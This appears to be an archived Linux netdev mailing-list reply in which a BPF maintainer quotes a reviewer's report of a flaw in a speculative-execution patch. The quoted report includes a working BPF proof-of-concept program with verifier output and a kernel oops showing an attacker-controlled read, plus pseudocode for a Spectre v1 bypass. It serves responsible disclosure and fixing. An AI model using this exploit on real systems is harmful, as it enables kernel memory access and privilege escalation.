Message-ID: <e5d87498-c42e-f53b-5637-9013c1d8d3bd@iogearbox.net>
Date:   Fri, 4 Jan 2019 00:22:49 +0100
From:   Daniel Borkmann <daniel@...earbox.net>
To:     Jann Horn <jannh@...gle.com>
Cc:     Alexei Starovoitov <ast@...nel.org>,
        "David S. Miller" <davem@...emloft.net>,
        jakub.kicinski@...ronome.com,
        Network Development <netdev@...r.kernel.org>
Subject: Re: [PATCH bpf v3 8/9] bpf: prevent out of bounds speculation on
 pointer arithmetic

Hi Jann,

On 01/03/2019 10:13 PM, Jann Horn wrote:
> Hi!
> 
> Sorry about the extremely slow reply, I was on vacation over the
> holidays and only got back today.
> 
> On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@...earbox.net> wrote:
>> Jann reported that the original commit back in b2157399cc98
>> ("bpf: prevent out-of-bounds speculation") was not sufficient
>> to stop CPU from speculating out of bounds memory access:
>> While b2157399cc98 only focused on masking array map access
>> for unprivileged users for tail calls and data access, such
>> that the user-provided index gets sanitized on the BPF program
>> and syscall side, there is still a more generic form that
>> affects most maps holding user data: dynamic map access from
>> BPF programs where the access offset is an unknown scalar or
>> a "slow" known scalar, for example:
> [...]
>> +static int sanitize_ptr_alu(struct bpf_verifier_env *env,
>> +                           struct bpf_insn *insn,
>> +                           const struct bpf_reg_state *ptr_reg,
>> +                           struct bpf_reg_state *dst_reg,
>> +                           bool off_is_neg)
>> +{
> [...]
>> +
>> +       /* If we arrived here from different branches with different
>> +        * limits to sanitize, then this won't work.
>> +        */
>> +       if (aux->alu_state &&
>> +           (aux->alu_state != alu_state ||
>> +            aux->alu_limit != alu_limit))
>> +               return -EACCES;
> 
> This code path doesn't get triggered in the case where the same
> ALU_ADD64 instruction is used for both "ptr += reg" and "numeric_reg
> += reg". This leads to kernel read/write because the code intended to
> ensure safety of the "ptr += reg" case in speculative execution ends
> up clobbering the addend in the "numeric_reg += reg" case:
> 
> source code:
> =============
> int main(void) {
>   int my_map = array_create(8, 30);
>   array_set(my_map, 0, 1);
>   struct bpf_insn insns[] = {
>     // load map value pointer into r0 and r2
>     BPF_LD_MAP_FD(BPF_REG_ARG1, my_map),
>     BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
>     BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -16),
>     BPF_ST_MEM(BPF_DW, BPF_REG_FP, -16, 0),
>     BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
>     BPF_EXIT_INSN(),
> 
>     // load some number from the map into r1
>     BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_0, 0),
> 
>     // depending on R1, branch:
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 3),
> 
>     // branch A
>     BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
>     BPF_MOV64_IMM(BPF_REG_3, 0),
>     BPF_JMP_A(2),
> 
>     // branch B
>     BPF_MOV64_IMM(BPF_REG_2, 0),
>     BPF_MOV64_IMM(BPF_REG_3, 0x100000),
> 
>     // *** COMMON INSTRUCTION ***
>     BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_3),
> 
>     // depending on R1, branch:
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1),
> 
>     // branch A
>     BPF_JMP_A(4),
> 
>     // branch B
>     BPF_MOV64_IMM(BPF_REG_0, 0x13371337),
>     // verifier-confused branch: verifier follows fall-through,
>     // runtime follows jump
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0x100000, 2),
>     BPF_MOV64_IMM(BPF_REG_0, 0),
>     BPF_EXIT_INSN(),
> 
>     // fake-dead code; targeted from branch A to prevent dead code sanitization
>     BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_0, 0),
>     BPF_MOV64_IMM(BPF_REG_0, 0),
>     BPF_EXIT_INSN()
>   };
>   int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
>   trigger_proc(sock_fd);
> }
> =============
> 
> verifier output:
> =============
> 0: (18) r1 = 0x0
> 2: (bf) r2 = r10
> 3: (07) r2 += -16
> 4: (7a) *(u64 *)(r10 -16) = 0
> 5: (85) call bpf_map_lookup_elem#1
> 6: (55) if r0 != 0x0 goto pc+1
>  R0=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
> 7: (95) exit
> 
> from 6 to 8: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm
> 8: (71) r1 = *(u8 *)(r0 +0)
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm
> 9: (55) if r1 != 0x0 goto pc+3
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
> 10: (bf) r2 = r0
> 11: (b7) r3 = 0
> 12: (05) goto pc+2
> 15: (0f) r2 += r3
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3_w=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
> 16: (55) if r1 != 0x0 goto pc+1
> 17: (05) goto pc+4
> 22: (71) r0 = *(u8 *)(r0 +0)
>  R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
> 23: (b7) r0 = 0
> 24: (95) exit
> 
> from 15 to 16 (speculative execution): safe
> 
> from 9 to 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R10=fp0,call_-1 fp-16=mmmmmmmm
> 13: (b7) r2 = 0
> 14: (b7) r3 = 1048576
> 15: (0f) r2 += r3
> 16: (55) if r1 != 0x0 goto pc+1
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=inv1048576 R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
> 17: (05) goto pc+4
> 22: safe
> 
> from 16 to 18: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R2=inv1048576 R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
> 18: (b7) r0 = 322376503
> 19: (55) if r2 != 0x100000 goto pc+2
> 20: (b7) r0 = 0
> 21: (95) exit
> processed 29 insns (limit 131072), stack depth 16
> =============
> 
> dmesg:
> =============
> [ 9948.417809] flen=38 proglen=205 pass=5 image=0000000039846164 from=test pid=2185
> [ 9948.421291] JIT code: 00000000: 55 48 89 e5 48 81 ec 38 00 00 00 48 83 ed 28 48
> [ 9948.424560] JIT code: 00000010: 89 5d 00 4c 89 6d 08 4c 89 75 10 4c 89 7d 18 31
> [ 9948.428734] JIT code: 00000020: c0 48 89 45 20 48 bf 88 43 c3 da 81 88 ff ff 48
> [ 9948.433479] JIT code: 00000030: 89 ee 48 83 c6 f0 48 c7 45 f0 00 00 00 00 48 81
> [ 9948.437504] JIT code: 00000040: c7 d0 00 00 00 8b 46 00 48 83 f8 1e 73 0c 83 e0
> [ 9948.443528] JIT code: 00000050: 1f 48 c1 e0 03 48 01 f8 eb 02 31 c0 48 83 f8 00
> [ 9948.447364] JIT code: 00000060: 75 16 48 8b 5d 00 4c 8b 6d 08 4c 8b 75 10 4c 8b
> [ 9948.451079] JIT code: 00000070: 7d 18 48 83 c5 28 c9 c3 48 0f b6 78 00 48 83 ff
> [ 9948.454900] JIT code: 00000080: 00 75 07 48 89 c6 31 d2 eb 07 31 f6 ba 00 00 10
> [ 9948.459435] JIT code: 00000090: 00 41 ba 07 00 00 00 49 29 d2 49 09 d2 49 f7 da
> [ 9948.466041] JIT code: 000000a0: 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83 ff 00 75 02
> [ 9948.470384] JIT code: 000000b0: eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04
> [ 9948.474085] JIT code: 000000c0: 31 c0 eb 9e 48 0f b6 40 00 31 c0 eb 95
> [ 9948.478102] BUG: unable to handle kernel paging request at 0000000013371337
> [ 9948.481562] #PF error: [normal kernel read fault]
> [ 9948.483878] PGD 0 P4D 0
> [ 9948.485139] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN
> [ 9948.487945] CPU: 5 PID: 2185 Comm: test Not tainted 4.20.0+ #225
> [ 9948.490864] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
> [ 9948.494912] RIP: 0010:0xffffffffc01602f3
> [ 9948.497212] Code: 49 09 d2 49 f7 da 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83 ff 00 75 02 eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 31 c0 eb 9e <48> 0f b6 40 00 31 c0 eb 95 cc cc cc cc cc cc cc cc cc cc cc cc cc
> [ 9948.506340] RSP: 0018:ffff8881e473f968 EFLAGS: 00010287
> [ 9948.508857] RAX: 0000000013371337 RBX: ffff8881e8f01e40 RCX: ffffffff9388f848
> [ 9948.512263] RDX: 0000000000100000 RSI: 0000000000000000 RDI: 0000000000000001
> [ 9948.515653] RBP: ffff8881e473f978 R08: ffffed103b747002 R09: ffffed103b747002
> [ 9948.519056] R10: 0000000000000000 R11: ffffed103b747001 R12: 0000000000000000
> [ 9948.522452] R13: 0000000000000001 R14: ffff8881e2718600 R15: ffffc90001572000
> [ 9948.525840] FS:  00007f2ad28ad700(0000) GS:ffff8881eb140000(0000) knlGS:0000000000000000
> [ 9948.529708] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [ 9948.532450] CR2: 0000000013371337 CR3: 00000001e76c5004 CR4: 00000000003606e0
> [ 9948.535834] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
> [ 9948.539217] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
> [ 9948.542581] Call Trace:
> [ 9948.543760]  ? sk_filter_trim_cap+0x148/0x2d0
> [ 9948.545847]  ? sk_reuseport_is_valid_access+0xa0/0xa0
> [ 9948.548249]  ? skb_copy_datagram_from_iter+0x6e/0x280
> [ 9948.550655]  ? _raw_spin_unlock+0x16/0x30
> [ 9948.552581]  ? deactivate_slab.isra.68+0x59d/0x600
> [ 9948.554866]  ? unix_scm_to_skb+0xd1/0x230
> [ 9948.556780]  ? unix_dgram_sendmsg+0x312/0x940
> [ 9948.558856]  ? unix_stream_connect+0x980/0x980
> [ 9948.560986]  ? aa_sk_perm+0x10c/0x3f0
> [ 9948.563123]  ? kasan_unpoison_shadow+0x35/0x40
> [ 9948.565107]  ? aa_af_perm+0x1e0/0x1e0
> [ 9948.566608]  ? kasan_unpoison_shadow+0x35/0x40
> [ 9948.568463]  ? unix_stream_connect+0x980/0x980
> [ 9948.570397]  ? sock_sendmsg+0x6d/0x80
> [ 9948.571948]  ? sock_write_iter+0x121/0x1c0
> [ 9948.573678]  ? sock_sendmsg+0x80/0x80
> [ 9948.575258]  ? sock_enable_timestamp+0x60/0x60
> [ 9948.576958]  ? iov_iter_init+0x86/0xc0
> [ 9948.578395]  ? __vfs_write+0x294/0x3b0
> [ 9948.579782]  ? kernel_read+0xa0/0xa0
> [ 9948.581152]  ? apparmor_task_setrlimit+0x330/0x330
> [ 9948.582919]  ? vfs_write+0xe7/0x230
> [ 9948.584228]  ? ksys_write+0xa1/0x120
> [ 9948.585559]  ? __ia32_sys_read+0x50/0x50
> [ 9948.587174]  ? do_syscall_64+0x73/0x160
> [ 9948.588872]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
> [ 9948.591134] Modules linked in: btrfs xor zstd_compress raid6_pq
> [ 9948.593654] CR2: 0000000013371337
> [ 9948.595078] ---[ end trace cea5ab7027131bf2 ]---
> =============

Good point, thanks for catching this scenario! I'll get this fixed so
that such programs are rejected.

> Aside from that, I also think that the pruning of "dead code" probably
> still permits v1 speculative execution attacks when code vaguely like
> the following is encountered, if it is possible to convince the CPU to
> mispredict the second branch, but I haven't tested that so far:
> 
> R0 = <slow map value, known to be 0>;
> R1 = <fast map value>;
> if (R1 != R0) { // mispredicted
>   return 0;
> }
> R3 = <a map value pointer>;
> R2 = <arbitrary 64-bit number>;
> if (R1 == 0) { // architecturally always taken, verifier prunes other branch
>   R2 = <a map value pointer>;
> }
> access R3[R2[0] & 1];
> 
> To convince the CPU to predict the second branch the way you want, you
> could probably add another code path that jumps in front of the branch
> with both R2 and R3 already containing valid pointers. Something like
> this:
> 
> if (<some map value>) {
>   R0 = <slow map value, known to be 0>;
>   R1 = <fast map value>;
>   if (R1 != R0) { // mispredicted
>     return 0;
>   }
>   R3 = <a map value pointer>;
>   R2 = <arbitrary 64-bit number>;
> } else {
>   R3 = <a map value pointer>;
>   R2 = <arbitrary 64-bit number>;
>   R1 = 1;
> }
> if (R1 == 0) { // architecturally always taken, verifier prunes other branch
>   R2 = <a map value pointer>;
> }
> access R3[R2[0] & 1];

Thanks, I'll look into evaluating this case as well after the fix.

Best,
Daniel
